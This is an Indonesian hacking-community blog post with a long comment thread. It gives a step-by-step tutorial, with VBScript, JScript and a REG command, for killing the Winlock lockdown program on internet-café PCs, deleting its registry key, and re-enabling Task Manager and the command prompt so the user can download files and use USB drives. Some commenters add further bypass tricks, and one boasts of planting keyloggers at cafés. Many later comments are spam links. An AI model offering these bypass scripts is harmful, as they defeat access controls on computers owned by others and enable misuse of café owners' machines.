Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Winlock Warnet With Script

18 November 2009
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner





Tutorial Iseng Di Warnet Versi Winlock

Okey, Pasti semua udah tau winlock itu apa kan ?

Kalo blom tau search aja di google yah..

Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.

Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.

Contohnya aja Net E*ph*ria / L*ghT*o Net di Jalan Kampus Anggrek-Syahdan.

Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.

Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.

Sebenernya sudah saya tulis di website pribadi / blog saya, Cuma gak ada salahnya kan buat sharing disini ? heheheh..

OK. Yang dibutuhin cuma 1. Notepad / Wordpad.

ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak.

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next


Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Best regards.

suicidal

Novrizal Zuhri

BINUS HACKER Binus Hacker Chat and Forum

Komentar

93 Komentar Untuk “Hacking Winlock Warnet With Script
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. suicidal pada 18 November 2009 6:38 am

    Masih bisa sampai sekarang. Huaahuahua..

  2. UtuH pada 30 November 2009 7:22 pm

    Selamat Mencoba All :)
    Huehue.. Si Zuhri Suka Iseng Juga Ternyata..
    Kzkzkz..

  3. BLACK pada 12 December 2009 7:15 pm

    w kaga ngarti…..

  4. rey pada 13 December 2009 6:30 pm

    alah,itu mah pelajaran hacker kelas 2 kalee,,,,,,,,,,,,,,,,,,,,,,,,,gak bermerek blash…..!!!!

  5. dera pada 13 December 2009 9:16 pm

    lok tes menejerx g bza dbka/disabel gmn sam…..????

  6. echo pada 19 December 2009 12:00 pm

    scriptx tu d tulis d mn om….hwahwahwa

  7. dhicky pada 19 December 2009 8:35 pm

    manteb…!
    hey warnet2 kampret[maaf saya kasar] i’ll be back
    udah nafsu banged download2 biar ntu warnet2 pelit bayar bill tambahan
    abis mau download yg 1mb aja buad download trainer game gak dikasih
    makasih atas tutornya

  8. LordAkbar pada 28 December 2009 11:21 pm

    bos,scriptnya di save di notepad kan dua2nya.?
    trus di save as file type vbs ya g ada bos
    adanya
    ansi
    unicode
    unicode big endian
    piye gan?

  9. sandal pada 16 January 2010 2:25 am

    thx ya bos……. :D

  10. Curthy Ali pada 5 February 2010 10:18 am

    HAlo Abang2 Hacker….Salam Kenal Dari Saya….
    Mengenai Yang Diatas Itu.. Aku Blm Terlalu Ngerti Cara Pemakaiannya.. Tlg Mnt Pnjlsnnya Yg Lebih jelas Bang…. Saya MOhon Bang Saya Kan Masi Pemula >>> Jadi Saya Mohon Batuan Dari Abang2 Hacker Semua…………………………….

  11. SAIFULLAH pada 15 February 2010 12:39 am

    knapa zhider g’ bsa di installl?,,,tlong q hacker,,,

  12. Riri_Gimbel pada 16 February 2010 8:50 pm

    KK .
    Ada gak sih cara mempercepat billing warnet .
    Sekali2 OP nya nih yang ngerjain User .
    Jangan sering2 OP yang di kerjain sama User karena billing nya di matiin atau di perlambat .
    Huhuhuhuh

  13. YanZ pada 18 February 2010 6:43 am

    hacker punya YM atau FB? mau konsultasi nih… >____<

  14. warui pada 11 March 2010 8:15 pm

    pantes warnet warnet banyak yg rugi garagara dikerjain…..
    sekali kali dong kasih OP masukan angan user terus yg dikasih masukan…..
    ….salam perdamaian…..

  15. Newbie pada 31 March 2010 3:07 pm

    pake proses explorer aja kaleeee langsung kill winlocknya…. dah langdah dongdot…. uppppsss donwload

  16. Dhil pada 9 April 2010 8:48 pm

    Mantebbbbbbbbb bg……….

  17. wahyudewabrata pada 14 April 2010 6:32 am

    mantap ni…

  18. SpetsnazINdo pada 18 April 2010 9:28 pm

    Klik kanan taskbar dan pilih Properties, kemudian check Show Clock dan tekan tombol
    OK.
    Buka Registri dgn menggunakan Registry tools

    Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “NoSetFolders” dan isi Value dengan nilai “0″.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “NoSetTaskbar” dan isikan dengan
    nilai “0″.
    Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
    Klik lagi Edit | New | DWORD Value. Beri nama dengan “DisableRegistryTools” dan isikan
    dengan nilai “1″.

    catatan:untuk bisa masuk ke tempat registry tool (ketik Regedit pada menu Run).

    cara mudah mematikan Deepris.

  19. pakaw pada 7 May 2010 11:48 am

    gw dah coba ntu script,and kaga ngerti…
    trus
    gw jalanin ada bacaanya line errorr
    code blalalalala
    error
    tp tq ya

  20. preman pada 7 May 2010 7:18 pm

    kagak ngeti blasss

  21. cahyono ronaldo pada 10 May 2010 8:28 am

    yang penting bagi ilmu ya
    :)

  22. jahil Dikit Di Warnet « Wallout's pada 17 May 2010 3:30 pm

    [...] View Original Article Blogged with the Flock Browser Categories: komputer Tag:Internet, komputer Komentar (0) Lacak Balik (0) Tinggalkan komentar Lacak balik [...]

  23. ashakura pada 4 June 2010 10:38 pm

    kk scrip winlock nya ga work tuh, winlock nya msh aja ke kunci

    smpe pusing² ngakalin nya tuh

  24. iLham pada 5 June 2010 7:30 am

    wkwkwkwk
    seru juga

  25. izai pada 3 July 2010 9:22 pm

    bisaaa ituu

    ….!

  26. adhe pada 6 July 2010 12:01 pm

    msal khn klw Task Manager dah d bka,tv d file.x ga da menu run,otomatis Run khn g bsa d bka…..gmna cra.x tuch???

  27. izai pada 7 July 2010 6:56 am

    mantap GAn>>>>>……!

  28. Lance pada 28 July 2010 12:48 am

    percuma

    kalau cmdnya kedisable juga.

    pake smadav yg ada toolnya sebenarnya ga ribet, bisa force open.

    saya salah satu admin juga, dan cara tersebut sudah benar2 basi.

  29. hasan pada 2 August 2010 5:17 pm

    bagus mas…..
    masok iki…..

  30. aries pada 13 August 2010 9:13 am

    saya memang baru dsn!!!!!!!!!
    hy abang” hecker????????
    plisssssssss saya g ngrti dgn smua ni…..
    hehehe
    minta pnjelasannya dunk

  31. emo pada 15 August 2010 5:07 pm

    mantap gann…
    berguna bgt bwt gw yg suka masang keylogger d warnet hehehe

  32. mpc pada 7 October 2010 6:17 am

    warnet gw banyak yg hackerin karena ad forum open dan ngak sempat buat security di buat security forum bahas lagi di hacker lagi gan

  33. buyung rancamana pada 23 October 2010 1:01 pm

    hacker2 bangsat rusak citra bangsa
    memang udh rusak di tambah rusak lagi hancur deh man

  34. gakpunyanama pada 8 November 2010 3:17 am

    om…..
    itu tutor’a jelasin tgg matiin Deepfreeze….
    klo Shadow Defender tau gk cara ubah password’a ????
    klo bisa kasih tau ke email aku ya….
    faith_x666@yahoo.co.id

  35. mr.xxx pada 9 November 2010 9:59 am

    bagi semua hacker boleh lah pake gituan trus klo misalnya client di kasih remot pa ngak jadi malu malu in

  36. mr.xxx pada 9 November 2010 10:01 am

    klo emang tu sukses di otak lo semua ngak mikir apa klo si wrnet sampai gulung tikar gara gara sering diusilin trus karyawannya mau di kemana in

  37. medical coder pada 11 January 2011 2:51 am

    Thanks for some quality points there. I am kind of new to online , so I printed this off to put in my file, any better way to go about keeping track of it then printing?

  38. ipang pada 30 January 2011 12:46 am

    kk saya mau nanya gmana klau menggunakan cyber billing and taskmanager d block ditambah deep freeze bukan ka itu sulit bangaet untuk menbuka exe yang d blok??????????? oleh warnet ya

  39. komentator pada 4 February 2011 1:16 am

    cyber billing + deepfeeze + task manager = ganjel aja F8 terus tekan Shitf+PrintScreen 10 detik … hasil nya taraaaa

  40. rizki pada 5 February 2011 10:34 pm

    kk kenapa saya waku update pointblank kok gak bisa .terus keluar winlock ada file yg korupt

  41. j0sdevil pada 21 February 2011 7:33 pm

    smw kk binus yg ckep n pinter”
    ajarin ak dong maklum ak ank daerah..
    tp ak sk bljr com …..
    n ak juga orang biasa gx ad uang bwt kursus..
    plizz ajarin yg gratisan…
    FB= J0h4N_sMILe@yahoo.com

  42. d1r4 pada 14 April 2011 6:53 pm

    pda riibeeedd…>>>>>>> BACA

    ctrl+alt+del lbh gmpang, tnggal tinggl end program billing yg lg booting.

  43. r4s4.asem pada 1 May 2011 1:29 am

    anda akan menanggung dosa yang diperbuat orang lain……bertobatlah…

  44. tamtam pada 8 May 2011 1:29 am

    udah ga bisa lagi pak .. mohon bimbingannya

  45. Rio pada 26 May 2011 8:15 am

    Aq jg punya Game Centre/online, dan u/ masalah user yg suka mengkill program yg terpasang diclient tanpa permisi :), agan” untuk sementara bisa membatasix dengan cara menjadikan program tersebut menjadi servis windows, jadi tiap kali di kill, maka services akan menjalankan programnya kembali secara otomatis ,
    misalnya jika user mengkill winlock pake cara diatas, maka setelah dikill maka akan dijalankan lagi olwh windows secara otomatis.
    dan jangan lupa untuk mendisable registry, gpedit.msc, services.msc, propertis dan taskmanager (cara membuat servis windows dan mendisable taskmanager dan akses” lainx banyak agan” yg menshare diblogx masing”, search aja digoogle), cara ini saya adaptasi dari program tingkalaku sebua virus,

    Jadi tidak selamanya cara kerja virus itu merugikan, sebagian tingka laku virus bisa kita ambil dan terapkan untuk melindungi kompi kita :) :) :)

  46. Tech pada 9 August 2011 5:37 pm

    hehe,,,mav
    cuma sekedar share ja..
    biar cara yang lebih gampang…
    ane pke process explorer..
    trs lngsng kill ja proses winlok.exe.a
    klo emang bner2 mo matiin fungsi winlok tsb, stlh di matiin prosesnya trs tnggl d unistal ja winlok.a..beres dah…hehe
    tks..mav cm skedar share..

  47. Techskill pada 13 August 2011 1:18 pm

    Klo windows xp kan ga perlu repot lagi klo dah kebuka notepadnya, klo aku gini kan misal kita sudah dapatkan notepadnya, tulis sesuatu dan jangan di save dulu lalu matikan komputernya.

    Tar disitu semua prosesnya mati dan pada akhir proses tuh windows minta izin kita mau dimatikan atau tidak notepadnya, yaudah klik aja cancel (semua proses mati kecuali notepad, dan komponen penting lainnya, klo beruntung si admin lupa ngeset winlocknya, jadi winlock ikutan mati). tapi itu bisa diterapkan ga disetiap warnet loh.

  48. aldo pada 21 August 2011 1:09 am

    woy, dah ga bisa kaka, !! >..<

  49. Wahyu pada 30 October 2011 12:23 pm

    bang nih program masih bisa atau ngga
    ko saiia coba ga bisa yah ??? mohon pencerahannya thx ^_^

  50. Achmad Rifai pada 24 March 2012 7:28 pm

    saya punya script langung bisa disable/enable

    cmd, local user, RUN, tsk manager, regedit,

    cman aku belom uploadin lagi males kapan2 aja ea

    file tersebut aku upload dengan nama file “System_Hacker.zip”
    coba check di url:smadav-bajakan.4shared.com

    jika kamu tidak menemuka di list (1) coba pindah ke daftar no (2)

    atau jika kamu tidak mengerti download disini
    http://www.4shared.com/zip/CHZf7sSB/file.html

    sekian thanks
    By:indousahacker@gmail.com

  51. takim_julak pada 10 April 2012 4:51 am

    klo d tempat gwe,,tetap gwe winlock,,dan cuman segitu syarat yg gwe tawar kan buat nge net warnet gwe,, jdi seumpama ngerasa terbatas dikarenakan ada winlock mending ke net lain aja,, dan mohon tidak nge Hack winlock gwe segala..

  52. nabit pada 28 June 2012 9:19 pm

    Saya ga ngerti.. Sebenarnya tutorial seperti ini untuk menghancurkan orang yang sedang mencari nafkah atau memang ingin merusak mengganggu warnet sekitar kita?

    tutorial hack semacam ini lebih banyak mendapat mudharat dari pada manfaat. Jika anda seorang pengusaha warnet apakah anda senang jika komputer anda di rusak??

  53. suicidal pada 2 July 2012 10:39 am

    Tolong plis jangan komentar yang aneh2.
    Disini saya hanya sekedar sharing pengalaman, jika memang ada yang dirugikan, ya maaf. Ini hanya sebagai bahan pembelajaran biar kedepannya lebih baik lagi.

    Untuk comment yang gampang tinggal download lah ato apalah.
    Disini kasusnya dalam konteks kita tidak dapat melakukan apa pun seperti download. Jadi tolong dipikirkan lagi kalo ada yang bilang cara basi ato apalah itu namanya, pake tools bisa dll. “INGAT INI ADALAH TEKNIK DENGAN HANYA MENGGUNAKAN NOTEPAD”.

    Dan 1 lagi, disini saya melakukan dengan kondisi PC yang sangat super di protect. Dan ini adalah triknya dalam melakukan bypass seperti diatas. Semua disabled mulai dari taskmgr, regedit, gpedit.msc, cmd, dll.

    Maaf jika ada komentar yang belum dibalas, ini trik lama dan hanya sekedar sharing.
    Thanks

  54. andri pada 6 October 2012 7:26 pm

    Gua kaga Ngerti……………

  55. facebook software engineer salary package pada 10 October 2012 4:32 pm

    Hi there, every time i used to check webpage posts here in the early hours in the break of day, for the reason that i like to gain knowledge of
    more and more.

  56. Ibnu pada 12 October 2012 5:22 pm

    Gua kaga ngerti pusing !!

  57. slumberlayan pada 14 October 2012 3:11 am

    Salam dari Malaysia,
    Saya sudah berjaya enable “cmd” dan juga sudah berjaya mencari lokasi winlock.exe.
    Namun, saya masih tidak faham final step bagaimana untuk shutdown/kill winlock.exe setelah ianya di-run di dlm cmd.

    Buat masa ini walaupun task manager dan cmd sudah boleh digunakan, tetapi saya masih belum dapat full-control computer yang sedang saya kerjakan.

    Saya telah mengikuti setiap langkah2 dan script yang anda berikan di atas. Cuma masalah dia final step sahaja.

    TQ
    slumberlayan

  58. hadipendekarcybercreeeeem pada 23 December 2012 7:04 pm

    hahahahaha gua ketawa aja lah

  59. angga pada 27 December 2012 2:21 am

    g bisa bos, karna task managernya juga g bisa di buka, apalagi run

  60. angga pada 27 December 2012 2:23 am

    warnet kyok dancok pelit nian dnload g bisa apa2 g bisa….

  61. heri pada 25 January 2013 4:29 am

    gimana cara mengatsi keamanan yar heker g bobol

  62. Bagi Rejeki pada 8 May 2013 7:42 am

    strComputer = “.”
    Set objWMIService = GetObject(“winmgmts:” _
    & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
    Set colProcessList = objWMIService.ExecQuery _
    (“Select * from Win32_Process Where Name = ‘winlock.exe’”)
    For Each objProcess in colProcessList
    objProcess.Terminate()
    Next

    scrip itu buat matiin winlock.exe

    jadi biar scripnya engga mempan, ganti aja nama winlock.exe dengan nama sembarang, lebih bagus lagi kalau namanya diganti menjadi critical proses nama windows seperti isass.exe, smss.exe, csrss.exe, winlogon.exe, dan lainnya.

    Dijamin scrip diatas engga mempan

  63. diaz pada 25 June 2013 10:59 pm

    gwa gk ngerti mau Cheat Cso Speed hack

  64. hendri pada 30 June 2013 1:48 pm

    Untuk kill winlock pke script no 1 bisa?
    Sebab dsni
    Windows+ctrl+alt+shift+delete tombol nya dinon aktifkan oleh
    Winlock…
    Klik kanan mouse juga…

    Jdi buka command prompt appun tdk bs…

    Cmn computernya tidak ada deepfreeze tkut nnti ada bekas…
    Gimana coba?

  65. Rain pada 1 August 2013 6:52 am

    hemz…pas sampe di cari tau letak winlocknya…kan di lock kk..g bsa di cari tau dmn winlocknya..gmn tu.?

  66. hack free download pada 5 November 2013 9:15 am

    very love this page … You can find out here read a lot of interesting things.

  67. heri pada 20 November 2013 2:57 am

    sekrang masih Aktif gan ?

  68. Anatamus pada 7 January 2014 7:58 am

    om admin,kalau boleh saya ingin gabung aktivis hacker donk.
    saya jurusan rekayasa perangkat lunak,namun ga diajarin soal hack.
    boleh ga ngefollow and gabung aktivis binus dan belajar coding” nya.

  69. roby pada 3 February 2014 8:39 pm

    kok ruet sih gann!!

  70. android wallpapers hd pada 26 February 2014 3:29 pm

    Hi to every single one, it’s in fact a fastidious for me to
    go to see this web site, it includes priceless Information.

  71. roby_pro_dewa pada 17 March 2014 7:48 am

    aduh caranya rumit amet sampai mouse gue rusak aq injak injak gara gara greget

  72. redirect virus pada 17 April 2014 9:46 am

    Unfortunately, paying the ransom demanded by these viruses does not reove the prlgrams from
    your computer. Look foor people related with the Spyware
    and delete them.You wouldn’t, however, be a diferent person at the core of yourself.

  73. Brodie pada 12 June 2014 9:39 am

    Woah! I’m really digging the template/theme of this blog.
    It’s simple, yet effective. A lot of times it’s hard to get that “perfect balance” between user friendliness and appearance.
    I must say that you’ve done a awesome job with this. Additionally,
    the blog loads super quick for me on Chrome.
    Outstanding Blog!

  74. http://topappguide.com/bingo-blitz-cheats pada 12 June 2014 11:28 pm

    We’re a group of volunteers and starting a new scheme in our community.
    Your website provided us with valuable info to work on. You have done an impressive job and our
    entire community will be grateful to you.

  75. come-0yumi.hotplace.pw pada 28 July 2014 5:02 pm

    Do you mind if I quote a couple of your articles as long as I provide credit and sources back to your website?
    My blog site is in the exact same area of interest as yours and my visitors would genuinely benefit from some of the information you provide
    here. Please let me know if this ok with you.
    Appreciate it!

  76. Jim pada 29 July 2014 6:04 am

    Very good article. I will be experiencing a few of these issues as well..

  77. دانلود آهنگ جدید pada 30 July 2014 5:07 am

    My brother suggested I would possibly like this web site.
    He was once entirely right. This post actually made my
    day. You cann’t believe simply how much time I had spent for this information! Thanks!

  78. Eloy pada 2 August 2014 1:07 pm

    Hi! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but
    I’m not seeing very good results. If you know of any please share.
    Cheers!

  79. Karry pada 2 August 2014 10:55 pm

    I have fun with, lead to I found just what I was looking for.
    You have ended my four day long hunt! God Bless you man. Have a great day.

    Bye

  80. Cathryn pada 4 August 2014 9:59 pm

    Asking questions are truly fastidious thing if you
    are not understanding anything completely, but this post provides good
    understanding even.

  81. http://mikeattwood.blogspot.ro/2013/04/the-forthcoming-badger-cull.html pada 4 August 2014 10:21 pm

    Bulks of the advertisers are primarily private house owners, letting managers and property agents.
    So unless any company completes the formalities and find the necessary certifications they can’t start
    their business. ” The company sees innovation as one of its core organizational competencies.

  82. Vietnam tours pada 5 August 2014 3:44 pm

    An intriguing discussion is definitely worth comment.
    I do believe that you ought to publish more on this
    topic, it might not be a taboo subject but generally folks don’t speak about
    such issues. To the next! All the best!!

  83. WordPress hosting pada 6 August 2014 3:25 am

    western font-family: “Calibri”, sans-serif; font-size: 11pt; so-language:
    en-US. You can also visit your blog’s home page by typing your domain name in the browser address bar, and then click Site
    Admin to access your Word – Press login screen. There is no doubt that the
    major impression of a Wordpess website is mainly reliant on the wordpress design.

  84. Pearline pada 6 August 2014 9:16 pm

    Excellent way of explaining, and good paragraph to
    get information regarding my presentation focus, which i am going to convey in university.

  85. auto part coupon pada 6 August 2014 10:10 pm

    Currently it sounds like Expression Engine is the top blogging platform available right now.
    (from what I’ve read) Is that what you are
    using on your blog?

  86. http://intro-e5fsb.hotplace.pw/ pada 6 August 2014 11:18 pm

    For hottest news you have to visit web and on world-wide-web I found this web
    page as a most excellent site for most up-to-date updates.

  87. Edgardo pada 6 August 2014 11:25 pm

    I’m really loving the theme/design of your web site. Do you ever run into any web browser compatibility problems?
    A couple of my blog audience have complained about my blog not working correctly in Explorer but looks great in Chrome.
    Do you have any recommendations to help fix this issue?

  88. trainstation hack pada 7 August 2014 10:57 am

    Thanks for sharing such a fastidious thinking, post is good, thats
    why i have read it completely

  89. pisc.es pada 7 August 2014 11:24 am

    This improves metabolism and the best top over the counter
    diet pills for women fast weight loss will happen when you feel more energetic and sexier.
    Walking for a lofty fat lunch. Measure body areas like
    calves, thighs, hips, abdomen, midsection, thighs and upper abdomen, bust, thighs or chest.
    Challenges are presented where 2lb. While this wouldn’t be surprised to
    top over the counter diet pills for women see yourself making.
    Therefore, as your primary goal. It becomes habit, life becomes boring, and 25 percent come from
    carbohydrates,” she said in her latest interview with UsWeekly.

  90. Ali pada 10 August 2014 3:59 am

    Hi! I just wanted to ask if you ever have any problems with hackers?
    My last blog (wordpress) wwas hacked and I
    ended up losing many months of hard woork due to no data backup.
    Do you have any methods to stop hackers?

  91. Jodi pada 11 August 2014 2:56 am

    If some one needs expert view about running a blog afterward i suggest him/her to pay a visit this blog, Keep up the good work.

  92. jacknespebjqteyro pada 18 August 2014 4:22 am

    Crude oil crept above US$96 a barrel as Hurricane Isaac picked up speed in the Gulf of Mexico, where roughly one-quarter of the country’s oil is produced. Much of the region’s production and refining activity has shut down. The National Hurricane Center forecast that Isaac would reach the coast of southeastern Louisiana late yesterday. [url=http://www.espad.fr/config.asp?nike-air-max-pas-cher/]nike air max pas cher[/url] Saudi Arabia has also increased production to make up for a drop in Libyan exports caused by the uprising in the smaller OPEC nation. Doing so, however, will cut into the country’s surplus supply for months. Investment banks said yesterday the move will put enough pressure on world supplies to keep oil prices at elevated levels this spring. [url=http://www.investir-immobilier.fr/header.asp?air-jordan-pas-cher/]air jordan pas cher[/url] The jobs created far from offset what American politicians and some economists see as the millions of jobs lost because of China’s currency policies and theft of intellectual property. Also, Chinese investment, especially in telecommunications and other sensitive businesses, isn’t always welcome. [url=http://www.internet-developpeurs.com/demo.asp?abercrombie-homme/]abercrombie homme[/url] SHANGHAI stock market showed signs of recovery from yesterday’s plunge as the key stock index closed slightly higher on strength of paper producers and commodity shares.

    MORE Chinese cities reported slower growth in home prices in September as tightening measures continued to take effect, China’s top statistic bureau said yesterday. [url=http://www.fromages-laqueuille.fr/produte.asp?air-max-pas-cher/]air max pas cher[/url] Still, it will give you results sometimes if it manages to catch only keywords. For example, the word “meeting” leads to your personal schedule, and “weather” or “rain” will lead to the weather forecast page, even though it can’t recognize other words in your sentence. [url=http://www.francoischouchan.com/class.asp?robe-hollister/]robe hollister[/url] China will also scrap the 20 percent equity investments by foreign investors to boost the domestic stock market, Xinhua news agency reported yesterday. Previously each RQFII investor needed to invest at least 80 percent of their funds in the onshore bond market with the rest going to stocks. The scrapping of the 20 percent equity investment suggests the CSRC is willing to give more autonomy to offshore investors and also signals China’s intention to enhance the yuan’s status in global financial markets. [url=http://www.clower.co.uk/uploadedimages/login.asp?hollister-sale-uk-2/]hollister sale uk[/url] Military and economic experts say it’s unlikely that Iran could successfully block the strait, and that producers could still transport their oil through land-based oil pipelines. Still, a dustup in the region would turn oil tankers into military targets, and that could keep markets on edge – and prices elevated – for months. SEMICONDUCTOR Manufacturing International Corp yesterday raised its second-quarter revenue and profit margin forecasts as the global chip market recovers.

    Best Buy climbed 66 cents, or 3.8 percent, to US$17.96 after announcing that its founder would be able to pursue his plans to buy the company and take it off the public stock market. [url=http://www.francoischouchan.fr/smenu.asp?louboutin-pas-cher-femme/]louboutin pas cher femme[/url] Japan’s Finance Minister Yoshihiko Noda said the Bank of Japan had begun to sell yen at 0000 GMT and other central banks from the G7 would intervene as their markets opened. [url=http://www.hotel-auvergne-saintroch.com/conn.asp?magasin-hollister/]magasin hollister[/url] Earlier in the day, the Dow was as high as 12,924.71, its highest level during a trading day since May 20, 2008. That was also the last day the average traded above 13,000. [url=http://www.judithhartjewellers.co.uk/uploadedimages/small.asp?fitflops-sale/]fitflops sale[/url] Rare earth minerals are used in a wide variety of high-tech applications and industries, ranging from energy-efficient lighting, iPhones and defense equipment to wind turbines, permanent magnets and electric motors.

    However, Lu Feng, a professor with the School of Government of Peking University, told Southern Weekly he doubted whether all the so-called home-brands by these joint ventures could really be China-made when all the key components were outdated foreign technology. [url=http://www.ricochetcreative.co.uk/uploadedimages/large.asp?mulberry-uk-sale/]mulberry uk sale[/url] Existing measures to cool down the country’s housing market should remain in place and be rigorously enforced. At the same time, the government would strive to curb steep rises in rents, it said.

  93. jackaceqvgngteyro pada 18 August 2014 4:23 am

    The measures “show the government’s determination to hold prices at their current level,” said Lee Wee Liat, a property analyst at Samsung Securities Ltd in Hong Kong. “It may signal they will take more significant steps and that’s to limit the number of units foreigners or mainlanders can buy in the city.” [url=http://www.espad.fr/config.asp?nike-air-max-pas-cher/]nike air max pas cher[/url] Gregoire and the governors of Georgia, Hawaii, North Carolina, Guam and Northern Mariana Islands will arrive in Beijing on Tuesday to participate in the second China-US Governors Forum. [url=http://www.investir-immobilier.fr/header.asp?jordan-pas-cher-homme/]jordan pas cher homme[/url] Contracts on Italy surged 32 basis points to 283, according to CMA prices. The Markit iTraxx SovX WE climbed 33 basis points to a record 289. An increase signals deteriorating perceptions of credit quality. [url=http://www.internet-developpeurs.com/demo.asp?abercrombie-paris-soldes/]abercrombie paris soldes[/url] Late on Friday and Saturday, the opportunists took to the websites eBay and Craigslist. They began marketing their hoard to whimsical collectors and junk-food lovers for hundreds – and in some cases – thousands of dollars. That’s a fat profit margin, when you consider the retail price for a box of 10 Twinkies is roughly US$5.

    JPMorgan Chase & Co raised its forecast for China’s economic growth from 8 percent to 8.2 percent this year on hopes the country’s infrastructure investment, housing market and manufacturing sector would continue to do well this year although growth in retail sales may ease in the next few months. [url=http://www.fromages-laqueuille.fr/produte.asp?chaussure-tn-pas-cher/]chaussure tn pas cher[/url] RENREN Inc, a Chinese social networking site, estimated losses of between US$15 million and US$17 million for the fourth quarter, and projected it would not be profitable this year. [url=http://www.francoischouchan.com/class.asp?pull-hollister/]pull hollister[/url] Markets are counting down to a summit of European Union leaders on Sunday that France has claimed will deliver a decisive outcome. [url=http://www.clower.co.uk/uploadedimages/login.asp?hollister-clearance/]hollister clearance[/url] We have two shops in New York so there’s quite a lot of the United States to go at, we’ve got one shop in Beijing so there’s quite a lot of China to go at, he said. Sales at gasoline stations surged 3.3 percent, the biggest gain since March last year, after rising 1.9 percent in January. Excluding autos and gasoline, sales rose 0.6 percent in February after increasing 1.0 percent the prior month. Gasoline accounted for 11.5 percent of retail sales in February.

